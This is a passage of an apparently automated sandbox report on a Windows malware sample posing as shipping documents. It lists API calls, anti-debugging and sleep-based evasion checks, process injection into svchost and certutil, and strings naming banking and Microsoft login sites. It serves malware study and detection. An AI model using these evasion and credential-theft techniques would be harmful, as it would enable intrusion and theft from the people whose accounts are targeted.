            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300283D push eax; iretd 2_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300135E push eax; iretd 2_2_03001369
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_03104390 push es; iretd 13_2_03104391
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_030FEA14 push 00000019h; retf 13_2_030FEA16
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_03117AD4 push A41E6336h; iretd 13_2_03117B03
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_03111912 push ss; ret 13_2_03111913
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_0310B900 push ebx; iretd 13_2_0310B931
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_03106905 push cs; iretd 13_2_03106906
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_0310E0AE pushfd ; ret 13_2_0310E0B1
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_031020D1 push es; iretd 13_2_031020D9
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_0310AF4E push esp; ret 13_2_0310AF57
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_0311C78A push edi; retf 13_2_0311C793
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_03113D6C push ebx; iretd 13_2_03113D7D
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe Code function: 13_2_03101C38 push ebp; retf 13_2_03101C41
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_00694A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00694A35
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_007155FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_007155FD
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006B33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_006B33C7
            Source: C:\Users\user\Desktop\Documente de expediere.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\certutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Documente de expediere.exe API/Special instruction interceptor: Address: 1543294
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\certutil.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\certutil.exe Window / User API: threadDelayed 1425
            Source: C:\Windows\SysWOW64\certutil.exe Window / User API: threadDelayed 8549
            Source: C:\Users\user\Desktop\Documente de expediere.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-99168
            Source: C:\Users\user\Desktop\Documente de expediere.exe API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\certutil.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412 Thread sleep count: 1425 > 30
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412 Thread sleep time: -2850000s >= -30000s
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412 Thread sleep count: 8549 > 30
            Source: C:\Windows\SysWOW64\certutil.exe TID: 7412 Thread sleep time: -17098000s >= -30000s
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436 Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436 Thread sleep count: 34 > 30
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436 Thread sleep time: -51000s >= -30000s
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe TID: 7436 Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\certutil.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006F4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_006F4696
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006FC93C FindFirstFileW,FindClose, 0_2_006FC93C
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006FC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_006FC9C7
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006FF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_006FF200
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006FF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_006FF35D
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006FF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_006FF65E
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006F3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_006F3A2B
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006F3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_006F3D4E
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006FBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_006FBF27
            Source: C:\Windows\SysWOW64\certutil.exe Code function: 14_2_032BBE20 FindFirstFileW,FindNextFileW,FindClose, 14_2_032BBE20
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_00694AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00694AFE
            Source: -Dbo613.14.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: -Dbo613.14.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: -Dbo613.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: -Dbo613.14.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: -Dbo613.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: outlook.office.comVMware20,11696492231s
            Source: -Dbo613.14.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: AMC password management pageVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: -Dbo613.14.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: -Dbo613.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
            Source: -Dbo613.14.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: -Dbo613.14.dr Binary or memory string: discord.comVMware20,11696492231f
            Source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3712964134.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: -Dbo613.14.dr Binary or memory string: global block list test formVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: -Dbo613.14.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: -Dbo613.14.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: -Dbo613.14.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: -Dbo613.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: -Dbo613.14.dr Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: -Dbo613.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: -Dbo613.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: firefox.exe, 00000012.00000002.1901011524.0000022C81CDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA7
            Source: -Dbo613.14.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: -Dbo613.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: -Dbo613.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: -Dbo613.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: -Dbo613.14.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\Documente de expediere.exe API call chain: ExitProcess graph end node graph_0-97774
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\certutil.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417843 LdrLoadDll, 2_2_00417843
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_007041FD BlockInput, 0_2_007041FD
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_00693B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00693B4C
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006C5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_006C5CCC
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_0070C304 LoadLibraryA,GetProcAddress, 0_2_0070C304
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_01543560 mov eax, dword ptr fs:[00000030h] 0_2_01543560
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_01543500 mov eax, dword ptr fs:[00000030h] 0_2_01543500
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_01541E70 mov eax, dword ptr fs:[00000030h] 0_2_01541E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h] 2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h] 2_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
